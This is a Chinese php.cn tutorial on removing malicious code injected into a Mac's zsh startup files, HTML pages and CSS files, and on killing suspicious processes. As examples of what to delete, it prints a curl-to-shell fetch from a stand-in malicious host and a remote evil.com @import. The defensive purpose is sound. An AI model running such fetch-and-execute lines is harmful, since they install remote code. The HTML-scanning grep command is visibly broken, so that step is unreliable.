0

0

Mac zsh脚本批量注入,CSS规则HTML一网打尽!

絕刀狂花

絕刀狂花

发布时间:2025-11-27 22:28:03

|

983人浏览过

|

来源于php中文网

原创

首先检查并清除zsh配置文件中的恶意代码,如~/.zshrc中curl自动执行命令;接着搜索html文件中被注入的可疑script标签,并用grep与sed批量清理;再排查css文件内非法@import远程样式行为;随后通过ps与kill终止恶意进程,检查launchagents启动项;最后重建zsh配置,加固系统安全策略以防止再次感染。

mac zsh脚本批量注入,css规则html一网打尽!

如果您在使用Mac系统时,发现zsh脚本被批量注入恶意代码,并且CSS规则和HTML文件也被篡改或植入异常内容,很可能是系统遭到了自动化脚本攻击。以下是针对此类问题的排查与修复步骤:

一、检查并清除zsh配置文件中的恶意注入

恶意脚本常通过修改用户的shell配置文件实现持久化驻留,需重点检查zsh的启动脚本。

1、打开终端,查看是否存在异常的zsh配置文件:ls -la ~/.zshrc ~/.zprofile ~/.zlogin ~/.zshenv

2、使用文本编辑器打开~/.zshrc文件,查找包含curlwgethttp等关键字的可疑命令行。

立即学习前端免费学习笔记(深入)”;

3、定位到类似curl -s http://malicious.site/script.sh | sh的自动执行语句,立即删除整行内容

4、保存文件后执行source ~/.zshrc重新加载配置,防止重启前再次触发。

二、扫描本地HTML文件中的异常嵌入代码

攻击者可能利用脚本遍历项目目录,在HTML中插入恶意<script>标签或外链资源。</script>

1、进入网站项目根目录,运行命令搜索所有含可疑JS引用的HTML文件:grep -r "html"

2、对输出结果逐一检查,确认是否为已知CDN链接;若来源不明,记录文件路径。

3、使用sed工具批量移除特定模式的注入代码,例如:sed -i '' '/malicious-domain.com/d' index.html

4、对于多个文件,可结合find与sed进行递归清理:find . -name "*.html" -exec sed -i '' "/attacker-script/d" {} \;

三、审查CSS文件中的非法@import规则

CSS文件可能被注入@import语句以加载远程样式表,用于界面伪造或资源消耗攻击。

1、在终端中执行查找命令:grep -r "@import.*http" ./css/ --include="*.css",检测异常导入。

2、打开匹配出的CSS文件,删除形如@import url('http://evil.com/style.css');的语句。

3、设置权限锁定重要样式文件,防止再次被写入:chmod 444 style.css

4、如需恢复原始版本,建议从干净备份中提取对应文件并替换。

四、查找并终止恶意后台进程

某些持久化脚本会在系统启动后运行守护进程,持续监控并重写文件。

1、列出当前活动进程中与网络相关的任务:ps aux | grep -E "(curl|wget|python|node)"

2、识别运行路径异常或用户名不符的条目,记下其PID编号。

3、使用kill命令强制终止可疑进程:kill -9 PID(将PID替换为实际数字)。

4、检查launchd代理列表是否有未知开机启动项:ls ~/Library/LaunchAgents/

五、重置终端环境并加固系统安全

完成清理后必须重建可信的命令执行环境,避免残留风险。

1、创建新的zsh配置文件:mv ~/.zshrc ~/.zshrc.bak && touch ~/.zshrc

2、仅添加必要的环境变量和别名,避免自动执行外部脚本。

3、安装并更新防病毒工具如osquery或KnockKnock,扫描系统潜在后门。

4、启用Gatekeeper和Mandatory Access Control策略,限制未签名脚本运行。

热门AI工具

更多
DeepSeek
DeepSeek

幻方量化公司旗下的开源大模型平台

豆包大模型
豆包大模型

字节跳动自主研发的一系列大型语言模型

通义千问
通义千问

阿里巴巴推出的全能AI助手

腾讯元宝
腾讯元宝

腾讯混元平台推出的AI助手

文心一言
文心一言

文心一言是百度开发的AI聊天机器人,通过对话可以生成各种形式的内容。

讯飞写作
讯飞写作

基于讯飞星火大模型的AI写作工具,可以快速生成新闻稿件、品宣文案、工作总结、心得体会等各种文文稿

即梦AI
即梦AI

一站式AI创作平台,免费AI图片和视频生成。

ChatGPT
ChatGPT

最最强大的AI聊天机器人程序,ChatGPT不单是聊天机器人,还能进行撰写邮件、视频脚本、文案、翻译、代码等任务。

相关专题

更多
curl_exec
curl_exec

curl_exec函数是PHP cURL函数列表中的一种,它的功能是执行一个cURL会话。给大家总结了一下php curl_exec函数的一些用法实例,这个函数应该在初始化一个cURL会话并且全部的选项都被设置后被调用。他的返回值成功时返回TRUE, 或者在失败时返回FALSE。

454

2023.06.14

linux常见下载安装工具
linux常见下载安装工具

linux常见下载安装工具有APT、YUM、DNF、Snapcraft、Flatpak、AppImage、Wget、Curl等。想了解更多linux常见下载安装工具相关内容,可以阅读本专题下面的文章。

183

2023.10.30

js正则表达式
js正则表达式

php中文网为大家提供各种js正则表达式语法大全以及各种js正则表达式使用的方法,还有更多js正则表达式的相关文章、相关下载、相关课程,供大家免费下载体验。

530

2023.06.20

js获取当前时间
js获取当前时间

JS全称JavaScript,是一种具有函数优先的轻量级,解释型或即时编译型的编程语言;它是一种属于网络的高级脚本语言,主要用于Web,常用来为网页添加各式各样的动态功能。js怎么获取当前时间呢?php中文网给大家带来了相关的教程以及文章,欢迎大家前来学习阅读。

554

2023.07.28

js 字符串转数组
js 字符串转数组

js字符串转数组的方法:1、使用“split()”方法;2、使用“Array.from()”方法;3、使用for循环遍历;4、使用“Array.split()”方法。本专题为大家提供js字符串转数组的相关的文章、下载、课程内容,供大家免费下载体验。

738

2023.08.03

js是什么意思
js是什么意思

JS是JavaScript的缩写,它是一种广泛应用于网页开发的脚本语言。JavaScript是一种解释性的、基于对象和事件驱动的编程语言,通常用于为网页增加交互性和动态性。它可以在网页上实现复杂的功能和效果,如表单验证、页面元素操作、动画效果、数据交互等。

6045

2023.08.17

js删除节点的方法
js删除节点的方法

js删除节点的方法有:1、removeChild()方法,用于从父节点中移除指定的子节点,它需要两个参数,第一个参数是要删除的子节点,第二个参数是父节点;2、parentNode.removeChild()方法,可以直接通过父节点调用来删除子节点;3、remove()方法,可以直接删除节点,而无需指定父节点;4、innerHTML属性,用于删除节点的内容。

492

2023.09.01

js截取字符串的方法
js截取字符串的方法

js截取字符串的方法有substring()方法、substr()方法、slice()方法、split()方法和slice()方法。本专题为大家提供字符串相关的文章、下载、课程内容,供大家免费下载体验。

219

2023.09.04

JavaScript浏览器渲染机制与前端性能优化实践
JavaScript浏览器渲染机制与前端性能优化实践

本专题围绕 JavaScript 在浏览器中的执行与渲染机制展开,系统讲解 DOM 构建、CSSOM 解析、重排与重绘原理,以及关键渲染路径优化方法。内容涵盖事件循环机制、异步任务调度、资源加载优化、代码拆分与懒加载等性能优化策略。通过真实前端项目案例,帮助开发者理解浏览器底层工作原理,并掌握提升网页加载速度与交互体验的实用技巧。

23

2026.03.06

热门下载

更多
网站特效
/
网站源码
/
网站素材
/
前端模板

精品课程

更多
相关推荐
/
热门推荐
/
最新课程
ASP 教程
ASP 教程

共34课时 | 5.7万人学习

PHP课程
PHP课程

共137课时 | 13.1万人学习

PHP入门速学(台湾同胞版)
PHP入门速学(台湾同胞版)

共10课时 | 1.3万人学习

关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送

Copyright 2014-2026 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号